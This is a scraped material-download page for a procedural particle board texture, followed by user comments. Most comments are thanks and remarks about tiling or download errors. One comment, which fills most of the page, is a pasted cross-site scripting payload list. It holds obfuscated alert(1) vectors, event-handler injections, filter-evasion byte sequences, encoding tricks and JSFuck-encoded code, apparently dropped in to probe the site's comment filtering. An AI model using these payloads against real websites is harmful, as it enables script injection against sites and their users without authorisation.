(41)

Particle Board Wood

Jeremie Noguer

MaterialsWood

Rough procedural particle board.

Uploaded: over 4 years ago
Updated: about 4 years ago
Version: 1
File Name: particle_board.zip
Size: 7.5 KB

DownloadblackDOWNLOAD



DISCUSS
over 4 years ago

GReat!!!!


over 4 years ago

tanks


about 4 years ago

I get an error on the download?


about 4 years ago

как это сасдать


about 4 years ago

how to create


almost 4 years ago

thanks


almost 4 years ago

For some reason, it's not tileable here.


over 3 years ago

...哇


over 3 years ago

nice !


over 3 years ago

It isn't tiling that well. Seam really pops.


about 3 years ago

非常感谢


about 3 years ago

thanks


about 3 years ago

Thank you ever so kindly. :3


about 3 years ago

Needed in every room.


about 3 years ago

Круто


about 3 years ago

Thank U♡


almost 3 years ago

thank you so much


almost 3 years ago

great


almost 3 years ago

thanks


almost 3 years ago

Thank you very much!


almost 3 years ago

If people could stop uploading uneditable sbsar and uplaod sbs instead, that'd be nice


almost 3 years ago

Awesome~


over 2 years ago

great, thanks a lot


over 2 years ago

THANKS


about 2 years ago

It is not tileble


almost 2 years ago

can you share the .sbs as well?


over 1 year ago

Thank You !!


over 1 year ago

substance牛逼!!!


about 1 year ago

Thanks for the texture


9 months ago

Very nice!!!


5 months ago

GReat!!!!


5 months ago

Thanks.


about 1 month ago

Thank you very much!


about 1 month ago

"/>
">
">

%253cimg%20onerror=alert(1)%20src=a%253e

%3cimg onerror=alert(1) src=a%3e

«img onerror=alert(1) src=a»

a\u006cert(1);

eval(‘a\u006cert(1)’);

eval(‘a\x6cert(1)’);

eval(‘a\154ert(1)’);

eval(‘a\l\ert\(1\)’);

eval(‘al’+’ert(1)’);

eval(String.fromCharCode(75,67,70));

eval(atob(‘amF2YXNjcmlwdDphbGVydCgxKQ’));

’alert(1)’.replace(/.+/,eval)

function::[‘alert’](1)

MsgBox 1

MSGBOX 1

execScript(“MsgBox 1”,”vbscript”);

execScript(“alert(1)”)

EXECSCRIPT(LCASE(“ALERT(1)”))

var a = ‘alert(1)

alert(‘kcf’)

“prompt(1)

“;alert(1)//

‘-alert(1)-’

“alert(1)

“;prompt(1)//

‘-prompt(1)-’

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

'`">javascript:alert(1)

'`">javascript:alert(1)

\x3Cscript>javascript:alert(1)

'"`>/* *\x2Fjavascript:alert(1)// */

javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)

--> -->

-->

-->

-->

`"'>a='hello\x27;javascript:alert(1)//';

test

test

test

test

test

test

test

test

test

test

test

test

test

test

/* *\x2A/javascript:alert(1)// */

/* *\x00/javascript:alert(1)// */

"'`>ABCDEF

"'`>ABCDEF

if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}

if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}

if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}

'`">javascript:alert(1)

"'`>

"'`>

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

"`'>\x3Bjavascript:alert(1)

"`'>\x0Djavascript:alert(1)

"`'>\xEF\xBB\xBFjavascript:alert(1)

"`'>\xE2\x80\x81javascript:alert(1)

"`'>\xE2\x80\x84javascript:alert(1)

"`'>\xE3\x80\x80javascript:alert(1)

"`'>\x09javascript:alert(1)

"`'>\xE2\x80\x89javascript:alert(1)

"`'>\xE2\x80\x85javascript:alert(1)

"`'>\xE2\x80\x88javascript:alert(1)

"`'>\x00javascript:alert(1)

"`'>\xE2\x80\xA8javascript:alert(1)

"`'>\xE2\x80\x8Ajavascript:alert(1)

"`'>\xE1\x9A\x80javascript:alert(1)

"`'>\x0Cjavascript:alert(1)

"`'>\x2Bjavascript:alert(1)

"`'>\xF0\x90\x96\x9Ajavascript:alert(1)

"`'>-javascript:alert(1)

"`'>\x0Ajavascript:alert(1)

"`'>\xE2\x80\xAFjavascript:alert(1)

"`'>\x7Ejavascript:alert(1)

"`'>\xE2\x80\x87javascript:alert(1)

"`'>\xE2\x81\x9Fjavascript:alert(1)

"`'>\xE2\x80\xA9javascript:alert(1)

"`'>\xC2\x85javascript:alert(1)

"`'>\xEF\xBF\xAEjavascript:alert(1)

"`'>\xE2\x80\x83javascript:alert(1)

"`'>\xE2\x80\x8Bjavascript:alert(1)

"`'>\xEF\xBF\xBEjavascript:alert(1)

"`'>\xE2\x80\x80javascript:alert(1)

"`'>\x21javascript:alert(1)

"`'>\xE2\x80\x82javascript:alert(1)

"`'>\xE2\x80\x86javascript:alert(1)

"`'>\xE1\xA0\x8Ejavascript:alert(1)

"`'>\x0Bjavascript:alert(1)

"`'>\x20javascript:alert(1)

"`'>\xC2\xA0javascript:alert(1)

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

"/>

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

javascript:alert(1)

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

javascript:alert(1)<\x00/script>

<img src=# onerror\x3D"javascript:alert(1)" >

<video poster=javascript:javascript:alert(1)//

<body onscroll=javascript:alert(1)><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

<form id=test onforminput=javascript:alert(1)><input></form><button form=test onformchange=javascript:alert(1)>X

<video><source onerror="javascript:javascript:alert(1)">

<video onerror="javascript:javascript:alert(1)"><source>

<form><button formaction="javascript:javascript:alert(1)">X

<body oninput=javascript:alert(1)><input autofocus>

<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#http://127.0.0.1:3555/xss_serve_payloads/kcf.html" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>

<frameset onload=javascript:alert(1)>

<table background="javascript:javascript:alert(1)">

<!--<img src="--><img
----------------------------

<sCrIpt>alert(1)

\

alert(1)

Firefox (\x09, \x0a, \x0d, \x20)
Chrome (Any character \x01 to \x20)

alert(0)

body{background-color:expression\(alert(1))}

document.write(‘<a hr\ef=j\avas\cript\:a\lert(2)>blah</a>’);

HTML Encoding

URL Encoding

CSS Hexadecimal Encoding
Joker
Joker
Joker
Joker

JavaScript
document.write(‘<img src=1 onerror=alert(1)>’);
document.write(‘\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x31\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x31\x29\x3E’);
document.write(‘\074\151\155\147\040\163\162\143\075\061\040\157\156\145\162\162\157\162\075\141\154\145\162\164\050\061\051\076’);
document.write(‘\u003C\u0069\u006D\u0067\u0020\u0073\u0072\u0063\u003D\u0031\u0020\u006F\u006E\u0065\u0072\u0072\u006F\u0072\u003D\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029\u003E’);

JavaScript
document.write(‘<img src=1 onerror=alert(1)>’);
document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,49,32,111,110,101,114,114,111,114,61,97,108,101,114,116,40,48,41,62));

JavaScript
alert(123)
\u0061\u006C\u0065\u0072\u0074(123)

Overlong UTF-8
< = %C0%BC = %E0%80%BC = %F0%80%80%BC
> = %C0%BE = %E0%80%BE = %F0%80%80%BE
‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
” = %C0%A2 = %E0%80%A2 = %F0%80%80%A2

%E0%80%BCimg%20src%3D%E0%80%A21%E0%80%A2%20onerror%3D%E0%80%A2alert(1)%E0%80%A2%E0%80%BE

UTF-7 (Missing charset?)

+ADw-img src=+ACI-1+ACI- onerror=+ACI-alert(1)+ACI- /+AD4-

Unicode .NET Ugliness
alert(1)
%uff1cscript%uff1ealert(1)%uff1c/script%uff1e

Classic ASP

%u3008img%20src%3D%221%22%20onerror%3D%22alert(%uFF071%uFF07)%22%u232A

and/or Useful features.
HTML 5 (Not comphrensive)

Usuage of non-existent elements

CSS Comments

JavaScript functions
window[‘alert’](0)
parent[‘alert’](1)
self[‘alert’](2)
top[‘alert’](3)

JavaScript into HTML

var junk = ‘alert(1)’;

HTML CSS

body { background-image:url(‘http://www.blah.com/alert(1)’); }

XML documents

URI Schemes

(IE)
alert(0)”> (Firefox, Chrome, Safari)
(Firefox, Chrome, Safari)

HTTP Parameter Pollution
http://target.com/something.xxx?a=val1&a=val2
ASP.NET a = val1,val2
ASP a = val1,val2
JSP a = val1
PHP a = val2

eval(location.hash.slice(1))
eval(location.hash) (Firefox)

http://target.com/something.jsp?inject=eval(location.hash.slice(1))#alert(1)
eval(name)” name=”alert(1)”>

$=~[];$={___:++$,$$$$:(![]+””)[$],__$:++$,$_$_:(![]+””)[$],_$_:++$,$_$$:({}+””)[$],$$_$:($[$]+””)[$],_$$:++$,$$$_:(!””+””)[$],$__:++$,$_$:++$,$$__:({}+””)[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+””)[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+””)[$.__$])+((!$)+””)[$._$$]+($.__=$.$_[$.$$_])+($.$=(!””+””)[$.__$])+($._=(!””+””)[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!””+””)[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+”\””+$.$_$_+(![]+””)[$._$_]+$.$$$_+”\\”+$.__$+$.$$_+$._$_+$.__+”(“+$.___+”)”+”\””)())();

(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()


about 4 years ago

error here too.. click on 'download' link and screen shows garbled text. :(